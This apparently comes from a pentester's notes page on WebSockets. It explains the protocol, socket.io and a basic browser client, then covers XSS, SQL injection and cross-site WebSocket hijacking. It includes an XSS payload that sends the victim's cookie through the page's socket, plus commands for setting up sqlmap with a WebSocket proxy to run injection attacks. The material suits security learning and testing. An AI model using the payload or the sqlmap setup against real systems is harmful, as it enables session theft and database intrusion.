WebSockets

modern_web_exploitation_techniques

WebSockets (RFC 6455) are natively supported by all modern browsers. A connection starts as an ordinary HTTP GET carrying an Upgrade: websocket header; once the server answers 101 Switching Protocols, the same TCP connection becomes a persistent, full-duplex channel over which client and server push messages to each other in real time, without HTTP's request/response cycle.

The socket.io library is a well-known library built on top of WebSockets (with an HTTP long-polling fallback) that adds the features real-world apps need, such as automatic reconnection, rooms and event-based messaging. Note that it layers its own (Engine.IO) framing on top of the WebSocket messages, so a raw WebSocket client does not interoperate with a socket.io server directly.

For simple applications, we can directly use the browser's WebSocket API (ws:// in clear, wss:// over TLS):

const socket = new WebSocket('ws://IP:port/test'); // or "wss://" for secure communication
socket.onopen = () => socket.send('test');         // send() before the connection is open throws InvalidStateError
socket.onmessage = message => console.log("Received: " + message.data);
socket.onerror = event => console.error("WebSocket error", event);
socket.onclose = event => console.log("Closed: " + event.code + " " + event.reason);

You can inspect WebSocket traffic in the browser's network tab (filter on WS) or in Burp's WebSockets history, which also lets you intercept, edit and replay individual messages. See also tools such as wscat (2.1k ⭐) and websocat (6.6k ⭐) for scripting clients from the command line.


WebSocket Pentester Notes ☠️


Depending on how the application uses WebSockets, the usual web bugs apply: data received over the socket that is written into the DOM (innerHTML and friends) gives XSS; message contents passed unsanitised to the back end give SQLi just as a POST parameter would; and because the handshake is a plain GET that the browser sends with cookies and that is not subject to the same-origin policy, a server that authenticates the socket by cookie without checking the Origin header is open to cross-site WebSocket hijacking (CSWSH), the WebSocket form of CSRF.

Example XSS payload, assuming the page keeps its connection in a global named socket; it pushes the victim's cookie through that socket, so it lands wherever the application delivers messages (e.g. a chat room the attacker also sits in):

<img src="" onerror="socket.send(document.cookie)">

SQLMap speaks HTTP, so pointing it directly at a WebSocket endpoint does not work; the usual workaround is a small HTTP-to-WebSocket proxy. We can try sqlmap-websocket-proxy (0.1k ⭐), but it's often more efficient to write your own (reuse one socket across requests, unify the responses so SQLMap can compare them for boolean/time-based detection, handle the app's message format and special attacks, etc.).

$ pipx install git+https://github.com/BKreisel/sqlmap-websocket-proxy
$ DEST="$HOME/tools/sqlmap-websocket-proxy"
$ git clone -b "main" https://github.com/BKreisel/sqlmap-websocket-proxy.git $DEST
$ # do any changes to the code
$ pipx install $DEST # or reinstall if already installed
$ # %param% in the message template is replaced with whatever sqlmap sends; the proxy listens on 1337
$ sqlmap-websocket-proxy -u 'ws://IP:port/testdb' -d '{"parameter":"%param%"}' -p 1337
$ # the * marks the injection point for sqlmap
$ sqlmap -u 'http://localhost:1337/?param1=1*' [...]

👻 To-do 👻

Stuff that I found but haven't read/used yet.